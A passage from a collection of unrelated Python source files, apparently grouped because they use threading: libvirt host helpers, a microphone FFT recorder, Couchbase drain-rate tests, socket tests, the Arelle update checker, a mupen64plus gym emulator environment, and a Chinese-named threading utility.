except libvirt.libvirtError:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error defining a secret with XML: %s') % xml)
def delete_secret(self, usage_type, usage_id):
"""Delete a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
secret = self.find_secret(usage_type, usage_id)
if secret is not None:
secret.undefine()
def _get_hardware_info(self):
"""Returns hardware information about the Node.
Note that the memory size is reported in MiB instead of KiB.
"""
return self.get_connection().getInfo()
def get_cpu_count(self):
"""Returns the total numbers of cpu in the host."""
return self._get_hardware_info()[2]
def get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
return self._get_hardware_info()[1]
def get_memory_mb_used(self):
"""Get the used memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
if sys.platform.upper() not in ['LINUX2', 'LINUX3']:
return 0
with open('/proc/meminfo') as fp:
m = fp.read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
if CONF.libvirt.virt_type == 'xen':
used = 0
for dom in self.list_instance_domains(only_guests=False):
try:
# TODO(sahid): we should have method list_guests()
# which returns Guest's objects
guest = libvirt_guest.Guest(dom)
# TODO(sahid): Use get_info...
dom_mem = int(guest._get_domain_info(self)[2])
except libvirt.libvirtError as e:
LOG.warn(_LW("couldn't obtain the memory from domain:"
" %(uuid)s, exception: %(ex)s") %
{"uuid": dom.UUIDString(), "ex": e})
continue
# skip dom0
if dom.ID() != 0:
used += dom_mem
else:
# the mem reported by dom0 is be greater of what
# it is being used
used += (dom_mem -
(int(m[idx1 + 1]) +
int(m[idx2 + 1]) +
int(m[idx3 + 1])))
# Convert it to MB
return used // units.Ki
else:
avail = (int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1]))
# Convert it to MB
return self.get_memory_mb_total() - avail // units.Ki
def get_cpu_stats(self):
"""Returns the current CPU state of the host with frequency."""
stats = self.get_connection().getCPUStats(
libvirt.VIR_NODE_CPU_STATS_ALL_CPUS, 0)
# getInfo() returns various information about the host node
# No. 3 is the expected CPU frequency.
stats["frequency"] = self._get_hardware_info()[3]
return stats
def write_instance_config(self, xml):
"""Defines a domain, but does not start it.
:param xml: XML domain definition of the guest.
:returns: a virDomain instance
"""
return self.get_connection().defineXML(xml)
def device_lookup_by_name(self, name):
"""Lookup a node device by its name.
:returns: a virNodeDevice instance
"""
return self.get_connection().nodeDeviceLookupByName(name)
def list_pci_devices(self, flags=0):
"""Lookup pci devices.
:returns: a list of virNodeDevice instance
"""
return self.get_connection().listDevices("pci", flags)
def compare_cpu(self, xmlDesc, flags=0):
"""Compares the given CPU description with the host CPU."""
return self.get_connection().compareCPU(xmlDesc, flags)
|
SWHear.py
|
"""
this is a stripped down version of the SWHear class.
It's designed to hold only a single audio sample in memory.
check my githib for a more complete version:
http://github.com/swharden
"""
import pyaudio
import time
import numpy as np
import threading
import sys
def getFFT(data,rate):
"""Given some data and rate, returns FFTfreq and FFT (half)."""
data=data*np.hamming(len(data))
fft=np.fft.fft(data)
fft=np.abs(fft)
#fft=10*np.log10(fft)
freq=np.fft.fftfreq(len(fft),1.0/rate)
return freq[:int(len(freq)/2)],fft[:int(len(fft)/2)]
class SWHear():
"""
The SWHear class is provides access to continuously recorded
(and mathematically processed) microphone data.
Arguments:
device - the number of the sound card input to use. Leave blank
to automatically detect one.
rate - sample rate to use. Defaults to something supported.
updatesPerSecond - how fast to record new data. Note that smaller
numbers allow more data to be accessed and therefore high
frequencies to be analyzed if using a FFT later
"""
def __init__(self,device=None,rate=None,updatesPerSecond=10):
self.p=pyaudio.PyAudio()
self.chunk=2048 # gets replaced automatically
self.updatesPerSecond=updatesPerSecond
self.chunksRead=0
self.device=device
self.rate=rate
### SYSTEM TESTS
def valid_low_rate(self,device):
"""set the rate to the lowest supported audio rate."""
for testrate in [25000]:
if self.valid_test(device,testrate):
return testrate
print("SOMETHING'S WRONG! I can't figure out how to use DEV",device)
return None
def valid_test(self,device,rate=25000):
"""given a device ID and a rate, return TRUE/False if it's valid."""
try:
self.info=self.p.get_device_info_by_index(device)
if not self.info["maxInputChannels"]>0:
return False
stream=self.p.open(format=pyaudio.paInt16,channels=1,
input_device_index=device,frames_per_buffer=self.chunk,
rate=int(self.info["defaultSampleRate"]),input=True)
stream.close()
return True
except:
return False
def valid_input_devices(self):
"""
See which devices can be opened for microphone input.
call this when no PyAudio object is loaded.
"""
mics=[]
for device in range(self.p.get_device_count()):
if self.valid_test(device):
mics.append(device)
if len(mics)==0:
print("no microphone devices found!")
else:
print("found %d microphone devices: %s"%(len(mics),mics))
return mics
### SETUP AND SHUTDOWN
def initiate(self):
"""run this after changing settings (like rate) before recording"""
if self.device is None:
self.device=self.valid_input_devices()[0] #pick the first one
if self.rate is None:
self.rate=self.valid_low_rate(self.device)
self.chunk = int(self.rate/self.updatesPerSecond) # hold one tenth of a second in memory
if not self.valid_test(self.device,self.rate):
print("guessing a valid microphone device/rate...")
self.device=self.valid_input_devices()[0] #pick the first one
self.rate=self.valid_low_rate(self.device)
self.datax=np.arange(self.chunk)/float(self.rate)
msg='recording from "%s" '%self.info["name"]
msg+='(device %d) '%self.device
msg+='at %d Hz'%self.rate
print(msg)
def close(self):
"""gently detach from things."""
print(" -- sending stream termination command...")
self.keepRecording=False #the threads should self-close
while(self.t.isAlive()): #wait for all threads to close
time.sleep(.1)
self.stream.stop_stream()
self.p.terminate()
### STREAM HANDLING
def stream_readchunk(self):
"""reads some audio and re-launches itself"""
try:
self.data = np.fromstring(self.stream.read(self.chunk),dtype=np.int16)
self.fftx, self.fft = getFFT(self.data,self.rate)
except Exception as E:
print(" -- exception! terminating...")
print(E,"\n"*5)
self.keepRecording=False
if self.keepRecording:
self.stream_thread_new()
else:
self.stream.close()
self.p.terminate()
print(" -- stream STOPPED")
self.chunksRead+=1
def stream_thread_new(self):
self.t=threading.Thread(target=self.stream_readchunk)
self.t.start()
def stream_start(self):
"""adds data to self.data until termination signal"""
self.initiate()
print(" -- starting stream")
self.keepRecording=True # set this to False later to terminate stream
self.data=None # will fill up with threaded recording data
self.fft=None
self.dataFiltered=None #same
self.stream=self.p.open(format=pyaudio.paInt16,channels=1,
rate=self.rate,input=True,frames_per_buffer=self.chunk)
self.stream_thread_new()
if __name__=="__main__":
ear=SWHear(updatesPerSecond=10) # optinoally set sample rate here
ear.stream_start() #goes forever
lastRead=ear.chunksRead
while True:
while lastRead==ear.chunksRead:
time.sleep(.01)
print(ear.chunksRead,len(ear.data))
lastRead=ear.chunksRead
print("DONE")
|
drainratetests.py
|
import datetime
import time
import unittest
from threading import Thread
import logger
from TestInput import TestInputSingleton
from membase.api.rest_client import RestConnection, RestHelper
from membase.helper.bucket_helper import BucketOperationHelper
from membase.helper.rebalance_helper import RebalanceHelper
from memcached.helper.data_helper import MemcachedClientHelper
from security.rbac_base import RbacBase
class DrainRateTests(unittest.TestCase):
def setUp(self):
self.log = logger.Logger.get_logger()
self.input = TestInputSingleton.input
self.assertTrue(self.input, msg="input parameters missing...")
self.master = self.input.servers[0]
self.bucket = "default"
self.number_of_items = -1
# Add built-in user
testuser = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'password': 'password'}]
RbacBase().create_user_source(testuser, 'builtin', self.master)
# Assign user to role
role_list = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'roles': 'admin'}]
RbacBase().add_user_role(role_list, RestConnection(self.master), 'builtin')
self._create_default_bucket()
self.drained_in_seconds = -1
self.drained = False
self.reader_shutdown = False
self._log_start()
def tearDown(self):
BucketOperationHelper.delete_all_buckets_or_assert([self.master], self)
rest = RestConnection(self.master)
# Remove rbac user in teardown
role_del = ['cbadminbucket']
temp = RbacBase().remove_user_role(role_del, rest)
self._log_finish()
def _log_start(self):
try:
msg = "{0} : {1} started ".format(datetime.datetime.now(), self._testMethodName)
RestConnection(self.servers[0]).log_client_error(msg)
except:
pass
def _log_finish(self):
try:
msg = "{0} : {1} finished ".format(datetime.datetime.now(), self._testMethodName)
RestConnection(self.servers[0]).log_client_error(msg)
except:
pass
def _create_default_bucket(self, replica=1):
name = "default"
self.bucket_storage = self.input.param("bucket_storage", 'couchstore')
master = self.input.servers[0]
rest = RestConnection(master)
helper = RestHelper(RestConnection(master))
if not helper.bucket_exists(name):
node_ram_ratio = BucketOperationHelper.base_bucket_ratio(self.input.servers)
info = rest.get_nodes_self()
available_ram = info.memoryQuota * node_ram_ratio
if(available_ram < 256):
available_ram = 256
rest.create_bucket(bucket=name, ramQuotaMB=int(available_ram),
replicaNumber=replica,
storageBackend=self.bucket_storage)
ready = BucketOperationHelper.wait_for_memcached(master, name)
self.assertTrue(ready, msg="wait_for_memcached failed")
self.assertTrue(helper.bucket_exists(name),
msg="unable to create {0} bucket".format(name))
def _load_data_for_buckets(self):
rest = RestConnection(self.master)
buckets = rest.get_buckets()
distribution = {128: 1.0}
self.bucket_data = {}
for bucket in buckets:
name = bucket.name.encode("ascii", "ignore")
self.bucket_data[name] = {}
self.bucket_data[name]["inserted_keys"], self.bucket_data[name]["rejected_keys"] = \
MemcachedClientHelper.load_bucket_and_return_the_keys(name=self.bucket,
servers=[self.master],
value_size_distribution=distribution,
number_of_threads=1,
number_of_items=self.number_of_items,
write_only=True,
moxi=True)
def _parallel_read(self):
rest = RestConnection(self.master)
buckets = rest.get_buckets()
while not self.reader_shutdown:
for bucket in buckets:
name = bucket.name.encode("ascii", "ignore")
mc = MemcachedClientHelper.direct_client(self.master, name)
for key in self.bucket_data[name]["inserted_keys"]:
mc.get(key)
def _monitor_drain_queue(self):
#start whenever drain_queue is > 0
rest = RestConnection(self.master)
start = time.time()
self.log.info("wait 2 seconds for bucket stats are up")
time.sleep(2)
stats = rest.get_bucket_stats(self.bucket)
self.log.info("current ep_queue_size: {0}".format(stats["ep_queue_size"]))
self.drained = RebalanceHelper.wait_for_persistence(self.master, self.bucket, timeout=300)
self.drained_in_seconds = time.time() - start
def _test_drain(self, parallel_read=False):
reader = None
loader = Thread(target=self._load_data_for_buckets)
loader.start()
self.log.info("waiting for loader thread to insert {0} items".format(self.number_of_items))
loader.join()
wait_for_queue = Thread(target=self._monitor_drain_queue)
wait_for_queue.start()
if parallel_read:
reader = Thread(target=self._parallel_read)
reader.start()
self.log.info("waiting for ep_queue == 0")
wait_for_queue.join()
self.log.info("took {0} seconds to drain {1} items".format(self.drained_in_seconds, self.number_of_items))
if parallel_read:
self.reader_shutdown = True
reader.join()
self.assertTrue(self.drained, "failed to drain all items")
def test_drain_10k_items_parallel_read(self):
self.number_of_items = 10 * 1000
self._test_drain(True)
def test_drain_10k_items(self):
self.number_of_items = 10 * 1000
self._test_drain()
def test_drain_100k_items(self):
self.number_of_items = 100 * 1000
self._test_drain()
def test_drain_100k_items_parallel_read(self):
self.number_of_items = 100 * 1000
self._test_drain(True)
def test_drain_1M_items(self):
self.number_of_items = 1 * 1000 * 1000
self._test_drain()
def test_drain_1M_items_parallel_read(self):
self.number_of_items = 1 * 1000 * 1000
self._test_drain(True)
|
test_sockets.py
|
# Import third-party packages
# --------------------------------------------------------------
import numpy as np
import sys, os
import pytest
import threading
import socket
import pickle
from datetime import datetime
import subprocess
# Import neighboring packages
# --------------------------------------------------------------
sys.path.append(os.path.dirname(os.path.dirname(
os.path.realpath(__file__))))
from cheby_checker import sockets
# Some tests of general sockets methods
# (tests of cheby-specific sockets classes are below)
# --------------------------------------------------------------
def run_fake_server(HOST = '127.0.0.1', PORT = 65432):
# Run a server to listen for a connection and then close it
# NB Don't run as-is : put in a thread, or something, to background-it
server_sock = socket.socket()
server_sock.bind((HOST,PORT))
server_sock.listen(0)
server_sock.accept()
server_sock.close()
assert True
def run_fake_client(HOST = '127.0.0.1', PORT = 65432):
# This is our fake test client that is just going to attempt to connect and disconnect
fake_client = socket.socket()
fake_client.settimeout(1)
fake_client.connect((HOST,PORT))
fake_client.close()
def test_threading_server_and_client(HOST = '127.0.0.1', PORT = 65431):
''' Adapted from https://www.devdungeon.com/content/unit-testing-tcp-server-client-python '''
# Start fake server in background thread
server_thread = threading.Thread(target=run_fake_server, args=(HOST,PORT))
server_thread.start()
# Test the clients basic connection and disconnection
# *** If the above server is not running, then this will not connect ***
run_fake_client(HOST=HOST, PORT=PORT)
# Ensure server thread ends
server_thread.join()
# Tests of cheby-specific sockets classes
# --------------------------------------------------------------
#def test_server_instantiation():
# S = sockets.Server()
# assert isinstance(S,sockets.Server)
# C = sockets.Client()
# assert isinstance(C,sockets.Client)
# return True
def test_demo_client_server_connect():
# launch client
C = sockets.Client()
# Send default "Hello World" message
# & collect returned signal from server
received = C._demo_client(VERBOSE=True)
# Check content of demo message
# is as expected (hard-coded demo content)
assert isinstance(received, dict)
ERR_STR = "\n".join( [ "*** received = %r " % received,
"This is likely to be caused if/when a server is NOT RUNNING.",
"A server needs to be launched BEFORE running these tests.",
"It is likely that I could do so as part of the test process.",
"But I haven't worked out how to do that yet."
" (https://realpython.com/testing-third-party-apis-with-mock-servers/) "
"For now, the simplest way to get a demo server running is to execute the following python command",
"python sockets_server_starter_DO_NOT_DELETE.py &"
"Then the pytests can be run.",
"Try to remember to kill the server afterwards ... "
] )
assert "msg" in received, ERR_STR
assert received["msg"] == 'Hello World!'
assert "received" in received
assert received["received"] == True
def test_demo_big_message_exchange():
# launch client
C = sockets.Client()
# Send large message
# & collect returned signal from server
n = int(3e3)
received = C._demo_client(data_dict = { "np" : np.random.random_sample( (n,n) ) }, VERBOSE=True)
# check that all is as expected
assert isinstance(received, dict)
assert "received" in received
assert received["received"] == True
assert "np" in received
assert isinstance( received["np"], np.ndarray )
assert received["np"].shape == (n,n)
|
Updater.py
|
'''
Created on May 30, 2010
@author: Mark V Systems Limited
(c) Copyright 2011 Mark V Systems Limited, All rights reserved.
'''
import tkinter.messagebox, webbrowser, os, threading
def checkForUpdates(cntlr):
if not cntlr.webCache.workOffline:
# check for updates in background
import threading
thread = threading.Thread(target=lambda c=cntlr: backgroundCheckForUpdates(c))
thread.daemon = True
thread.start()
def backgroundCheckForUpdates(cntlr):
actualUrl = None
cntlr.showStatus(_("Checking for updates to Arelle"))
try:
actualUrl = cntlr.webCache.geturl(cntlr.updateURL)
if actualUrl:
cntlr.showStatus("") # clear web loading status entry
cntlr.uiThreadQueue.put((checkUpdateUrl, [cntlr, actualUrl]))
except:
cntlr.showStatus("") # clear web loading status entry
def checkUpdateUrl(cntlr, actualUrl):
# get latest header file
try:
from arelle import WebCache, Version
filename = os.path.basename(actualUrl)
if filename and "-20" in filename:
i = filename.index("-20") + 1
filenameDate = filename[i:i+10]
versionDate = Version.version[0:10]
if filenameDate > versionDate:
# newer
reply = tkinter.messagebox.askyesnocancel(
_("arelle\u2122 - Updater"),
_("Update {0} is available, running version is {1}. \n\nDownload now? \n\n(Arelle will exit before installing.)").format(
filenameDate, versionDate),
parent=cntlr.parent)
if reply is None:
return False
if reply:
thread = threading.Thread(target=lambda u=actualUrl: backgroundDownload(cntlr, u))
thread.daemon = True
thread.start()
else:
if filenameDate < versionDate:
msg = _("Arelle running version, {0}, is newer than the downloadable version, {1}.").format(
versionDate, filenameDate)
else:
msg = _("Arelle running version, {0}, is the same as the downloadable version.").format(
versionDate)
tkinter.messagebox.showwarning(_("arelle\u2122 - Updater"), msg, parent=cntlr.parent)
except:
pass
return
def backgroundDownload(cntlr, url):
filepathtmp = cntlr.webCache.getfilename(cntlr.updateURL, reload=True)
cntlr.modelManager.showStatus(_("Download ompleted"), 5000)
filepath = os.path.join(os.path.dirname(filepathtmp), os.path.basename(url))
os.rename(filepathtmp, filepath)
cntlr.uiThreadQueue.put((install, [cntlr,filepath]))
def install(cntlr,filepath):
import sys
if sys.platform.startswith("win"):
os.startfile(filepath)
else:
if sys.platform in ("darwin", "macos"):
command = 'open'
else: # linux/unix
command = 'xdg-open'
try:
import subprocess
subprocess.Popen([command,filepath])
except:
pass
cntlr.uiThreadQueue.put((cntlr.quit, []))
|
mupen64plus_env.py
|
import sys
PY3_OR_LATER = sys.version_info[0] >= 3
if PY3_OR_LATER:
# Python 3 specific definitions
from http.server import BaseHTTPRequestHandler, HTTPServer
else:
# Python 2 specific definitions
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import abc
import array
from contextlib import contextmanager
import inspect
import itertools
import json
import os
import subprocess
import threading
import time
from termcolor import cprint
import yaml
import gym
from gym import error, spaces, utils
from gym.utils import seeding
import numpy as np
import mss
###############################################
class ImageHelper:
def GetPixelColor(self, image_array, x, y):
base_pixel = image_array[y][x]
red = base_pixel[0]
green = base_pixel[1]
blue = base_pixel[2]
return (red, green, blue)
###############################################
### Variables & Constants ###
###############################################
# The width, height, and depth of the emulator window:
SCR_W = 640
SCR_H = 480
SCR_D = 3
MILLISECOND = 1.0 / 1000.0
IMAGE_HELPER = ImageHelper()
###############################################
class Mupen64PlusEnv(gym.Env):
__metaclass__ = abc.ABCMeta
metadata = {'render.modes': ['human']}
def __init__(self):
self.viewer = None
self.reset_count = 0
self.step_count = 0
self.running = True
self.mss_grabber = None
self.episode_over = False
self.pixel_array = None
self._base_load_config()
self._base_validate_config()
self.frame_skip = self.config['FRAME_SKIP']
if self.frame_skip < 1:
self.frame_skip = 1
self.controller_server, self.controller_server_thread = self._start_controller_server()
save_state = self._get_save_state()
self.xvfb_process, self.emulator_process = \
self._start_emulator(rom_name=self.config['ROM_NAME'],
gfx_plugin=self.config['GFX_PLUGIN'],
input_driver_path=self.config['INPUT_DRIVER_PATH'],
save_state=save_state)
with self.controller_server.frame_skip_disabled():
self._navigate_menu()
self.observation_space = \
spaces.Box(low=0, high=255, shape=(SCR_H, SCR_W, SCR_D))
self.action_space = spaces.MultiDiscrete([[-80, 80], # Joystick X-axis
[-80, 80], # Joystick Y-axis
[ 0, 1], # A Button
[ 0, 1], # B Button
[ 0, 1], # RB Button
[ 0, 1], # LB Button
[ 0, 1], # Z Button
[ 0, 1], # C Right Button
[ 0, 1], # C Left Button
[ 0, 1], # C Down Button
[ 0, 1], # C Up Button
[ 0, 1], # D-Pad Right Button
[ 0, 1], # D-Pad Left Button
[ 0, 1], # D-Pad Down Button
[ 0, 1], # D-Pad Up Button
[ 0, 1], # Start Button
])
def _get_save_state(self):
save_state = self.config.get('SAVE_STATE')
return os.path.join(self._saves_dir(), save_state)
def _saves_dir(self):
return os.path.join(os.path.dirname(inspect.stack()[0][1]), '../saves')
def _base_load_config(self):
self.config = yaml.safe_load(open(os.path.join(os.path.dirname(inspect.stack()[0][1]), "config.yml")))
self._load_config()
@abc.abstractmethod
def _load_config(self):
return
def _base_validate_config(self):
if 'ROM_NAME' not in self.config:
raise AssertionError('ROM_NAME configuration is required')
if 'GFX_PLUGIN' not in self.config:
raise AssertionError('GFX_PLUGIN configuration is required')
self._validate_config()
@abc.abstractmethod
def _validate_config(self):
return
def _step(self, action):
#cprint('Step %i: %s' % (self.step_count, action), 'green')
self._act(action)
obs = self._observe()
self.episode_over = self._evaluate_end_state()
reward = self._get_reward()
self.step_count += 1
return obs, reward, self.episode_over, {}
def _act(self, action, count=1):
for _ in itertools.repeat(None, count):
self.controller_server.send_controls(ControllerState(action))
def _wait(self, count=1, wait_for='Unknown'):
self._act(ControllerState.NO_OP, count=count)
def _press_button(self, button, times=1):
for _ in itertools.repeat(None, times):
self._act(button) # Press
self._act(ControllerState.NO_OP) # and release
def _observe(self):
#cprint('Observe called!', 'yellow')
if self.config['USE_XVFB']:
offset_x = 0
offset_y = 0
else:
offset_x = self.config['OFFSET_X']
offset_y = self.config['OFFSET_Y']
image_array = \
np.array(self.mss_grabber.grab({"top": offset_y,
"left": offset_x,
"width": SCR_W,
"height": SCR_H}),
dtype=np.uint8)
# drop the alpha channel and flip red and blue channels (BGRA -> RGB)
self.pixel_array = np.flip(image_array[:, :, :3], 2)
return self.pixel_array
@abc.abstractmethod
def _navigate_menu(self):
return
@abc.abstractmethod
def _get_reward(self):
#cprint('Get Reward called!', 'yellow')
return 0
@abc.abstractmethod
def _evaluate_end_state(self):
#cprint('Evaluate End State called!', 'yellow')
return False
@abc.abstractmethod
def _reset(self):
cprint('Reset called!', 'yellow')
self.reset_count += 1
self.step_count = 0
return self._observe()
def _render(self, mode='human', close=False):
if close:
if hasattr(self, 'viewer') and self.viewer is not None:
self.viewer.close()
self.viewer = None
return
img = self.pixel_array
if mode == 'rgb_array':
return img
elif mode == 'human':
if not hasattr(self, 'viewer') or self.viewer is None:
from gym.envs.classic_control import rendering
self.viewer = rendering.SimpleImageViewer()
self.viewer.imshow(img)
def _close(self):
cprint('Close called!', 'yellow')
self.running = False
self._kill_emulator()
self._stop_controller_server()
def _start_controller_server(self):
server = ControllerHTTPServer(server_address = ('', self.config['PORT_NUMBER']),
control_timeout = self.config['ACTION_TIMEOUT'],
frame_skip = self.frame_skip) # TODO: Environment argument (with issue #26)
server_thread = threading.Thread(target=server.serve_forever, args=())
server_thread.daemon = True
server_thread.start()
print('ControllerHTTPServer started on port ', self.config['PORT_NUMBER'])
return server, server_thread
def _stop_controller_server(self):
#cprint('Stop Controller Server called!', 'yellow')
if hasattr(self, 'controller_server'):
self.controller_server.shutdown()
def _start_emulator(self,
rom_name,
gfx_plugin,
input_driver_path,
res_w=SCR_W,
res_h=SCR_H,
res_d=SCR_D,
save_state=None):
rom_path = os.path.abspath(
os.path.join(os.path.dirname(inspect.stack()[0][1]),
'../ROMs',
rom_name))
if not os.path.isfile(rom_path):
msg = "ROM not found: " + rom_path
cprint(msg, 'red')
raise Exception(msg)
input_driver_path = os.path.abspath(os.path.expanduser(input_driver_path))
if not os.path.isfile(input_driver_path):
msg = "Input driver not found: " + input_driver_path
cprint(msg, 'red')
raise Exception(msg)
cmd = [self.config['MUPEN_CMD'],
"--nospeedlimit",
"--nosaveoptions",
"--resolution",
"%ix%i" % (res_w, res_h),
"--gfx", gfx_plugin,
"--audio", "dummy",
"--input", input_driver_path,
rom_path]
if save_state:
cmd.insert(-1, '--savestate')
cmd.insert(-1, save_state)
initial_disp = os.environ["DISPLAY"]
cprint('Initially on DISPLAY %s' % initial_disp, 'red')
xvfb_proc = None
if self.config['USE_XVFB']:
display_num = -1
success = False
# If we couldn't find an open display number after 15 attempts, give up
while not success and display_num <= 15:
display_num += 1
xvfb_cmd = [self.config['XVFB_CMD'],
":" + str(display_num),
"-screen",
"0",
"%ix%ix%i" % (res_w, res_h, res_d * 8),
"-fbdir",
self.config['TMP_DIR']]
cprint('Starting xvfb with command: %s' % xvfb_cmd, 'yellow')
xvfb_proc = subprocess.Popen(xvfb_cmd, shell=False, stderr=subprocess.STDOUT)
time.sleep(2) # Give xvfb a couple seconds to start up
# Poll the process to see if it exited early
# (most likely due to a server already active on the display_num)
if xvfb_proc.poll() is None:
success = True
print('')
if not success:
msg = "Failed to initialize Xvfb!"
cprint(msg, 'red')
raise Exception(msg)
os.environ["DISPLAY"] = ":" + str(display_num)
cprint('Using DISPLAY %s' % os.environ["DISPLAY"], 'blue')
cprint('Changed to DISPLAY %s' % os.environ["DISPLAY"], 'red')
cmd = [self.config['VGLRUN_CMD'], "-d", ":" + str(display_num)] + cmd
cprint('Starting emulator with comand: %s' % cmd, 'yellow')
emulator_process = subprocess.Popen(cmd,
env=os.environ.copy(),
shell=False,
stderr=subprocess.STDOUT)
# TODO: Test and cleanup:
# May need to initialize this after the DISPLAY env var has been set
# so it attaches to the correct X display; otherwise screenshots may
# come from the wrong place. This used to be true when we were using
# wxPython for screenshots. Untested after switching to mss.
cprint('Calling mss.mss() with DISPLAY %s' % os.environ["DISPLAY"], 'red')
self.mss_grabber = mss.mss()
time.sleep(2) # Give mss a couple seconds to initialize; also may not be necessary
# Restore the DISPLAY env var
os.environ["DISPLAY"] = initial_disp
cprint('Changed back to DISPLAY %s' % os.environ["DISPLAY"], 'red')
emu_mon = EmulatorMonitor()
monitor_thread = threading.Thread(target=emu_mon.monitor_emulator,
args=[emulator_process])
monitor_thread.daemon = True
monitor_thread.start()
return xvfb_proc, emulator_process
def _kill_emulator(self):
#cprint('Kill Emulator called!', 'yellow')
try:
self._act(ControllerState.NO_OP)
if self.emulator_process is not None:
self.emulator_process.kill()
if self.xvfb_process is not None:
self.xvfb_process.terminate()
except AttributeError:
pass # We may be shut down during intialization before these attributes have been set
###############################################
class EmulatorMonitor:
def monitor_emulator(self, emulator):
emu_return = emulator.poll()
while emu_return is None:
time.sleep(2)
if emulator is not None:
emu_return = emulator.poll()
else:
print('Emulator reference is no longer valid. Shutting down?')
return
# TODO: this means our environment died... need to die too
print('Emulator closed with code: ' + str(emu_return))
###############################################
class ControllerState(object):
# Controls [ JX, JY, A, B, RB, LB, Z, CR, CL, CD, CU, DR, DL, DD, DU, S]
NO_OP = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
START_BUTTON = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]
A_BUTTON = [ 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
B_BUTTON = [ 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
RB_BUTTON = [ 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
CR_BUTTON = [ 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0]
CL_BUTTON = [ 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0]
CD_BUTTON = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0]
CU_BUTTON = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0]
JOYSTICK_UP = [ 0, 127, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
JOYSTICK_DOWN = [ 0, -128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
JOYSTICK_LEFT = [-128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
JOYSTICK_RIGHT = [ 127, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
def __init__(self, controls=NO_OP):
self.X_AXIS = controls[0]
self.Y_AXIS = controls[1]
self.A_BUTTON = controls[2]
self.B_BUTTON = controls[3]
self.R_TRIG = controls[4]
self.L_TRIG = controls[5]
self.Z_TRIG = controls[6]
self.R_CBUTTON = controls[7]
self.L_CBUTTON = controls[8]
self.D_CBUTTON = controls[9]
self.U_CBUTTON = controls[10]
self.R_DPAD = controls[11]
self.L_DPAD = controls[12]
self.D_DPAD = controls[13]
self.U_DPAD = controls[14]
self.START_BUTTON = controls[15]
def to_json(self):
return json.dumps(self.__dict__)
###############################################
class ControllerHTTPServer(HTTPServer, object):
def __init__(self, server_address, control_timeout, frame_skip):
self.control_timeout = control_timeout
self.controls = ControllerState()
self.hold_response = True
self.running = True
self.send_count = 0
self.frame_skip = frame_skip
self.frame_skip_enabled = True
self.TEXT_PLAIN_CONTENT_TYPE = "text/plain".encode()
super(ControllerHTTPServer, self).__init__(server_address, self.ControllerRequestHandler)
def send_controls(self, controls):
#print('Send controls called')
self.send_count = 0
self.controls = controls
self.hold_response = False
# Wait for controls to be sent:
#start = time.time()
while not self.hold_response: # and time.time() < start + self.control_timeout:
time.sleep(MILLISECOND)
def shutdown(self):
self.running = False
super(ControllerHTTPServer, self).shutdown()
super(ControllerHTTPServer, self).server_close()
# http://preshing.com/20110920/the-python-with-statement-by-example/#implementing-the-context-manager-as-a-generator
@contextmanager
def frame_skip_disabled(self):
self.frame_skip_enabled = False
yield True
self.frame_skip_enabled = True
class ControllerRequestHandler(BaseHTTPRequestHandler, object):
def log_message(self, fmt, *args):
pass
def write_response(self, resp_code, resp_data):
self.send_response(resp_code)
self.send_header("Content-type", self.server.TEXT_PLAIN_CONTENT_TYPE)
self.end_headers()
self.wfile.write(resp_data.encode())
def do_GET(self):
while self.server.running and self.server.hold_response:
time.sleep(MILLISECOND)
if not self.server.running:
print('Sending SHUTDOWN response')
# TODO: This sometimes fails with a broken pipe because
# the emulator has already stopped. Should handle gracefully (Issue #4)
self.write_response(500, "SHUTDOWN")
### respond with controller output
self.write_response(200, self.server.controls.to_json())
self.server.send_count += 1
# If we have sent the controls 'n' times, now we block until the next action is sent
if self.server.send_count >= self.server.frame_skip or not self.server.frame_skip_enabled:
self.server.hold_response = True
return
###############################################
|
threadingUtil.py
|
"""
.. Hint::
线程操作有线程池
.. literalinclude:: ../../../pyefun/threadingUtil_test.py
:language: python
:caption: 代码示例
:linenos:
"""
from .public import *
import threading
from concurrent.futures import ThreadPoolExecutor
from threading import current_thread
@异常处理返回类型逻辑型
def 启动线程(函数名, 参数=(), 跟随主线程结束=False):
"成功返回线程对象,参数用元组形式传入,返回线程对象,daemon属性为False,主线程结束时会检测该子线程是否结束"
线程 = threading.Thread(target=函数名, args=参数, daemon=跟随主线程结束)
线程.start()
return 线程
class 互斥锁:
'类似许可证,这个可能会造成死锁'
def __init__(self):
self.lock = threading.Lock()
@异常处理返回类型逻辑型
def 进入(self):
self.lock.acquire()
@异常处理返回类型逻辑型
def 退出(self):
self.lock.release()
class 递归锁:
'类似许可证,互斥锁的升级版,这个不会造成死锁'
def __init__(self):
self.lock = threading.RLock()
@异常处理返回类型逻辑型
def 进入(self):
self.lock.acquire()
@异常处理返回类型逻辑型
def 退出(self):
self.lock.release()
class 信号量:
'设置最大同时运行的线程数'
def __init__(self, 数量=1):
self.lock = threading.BoundedSemaphore(数量)
@异常处理返回类型逻辑型
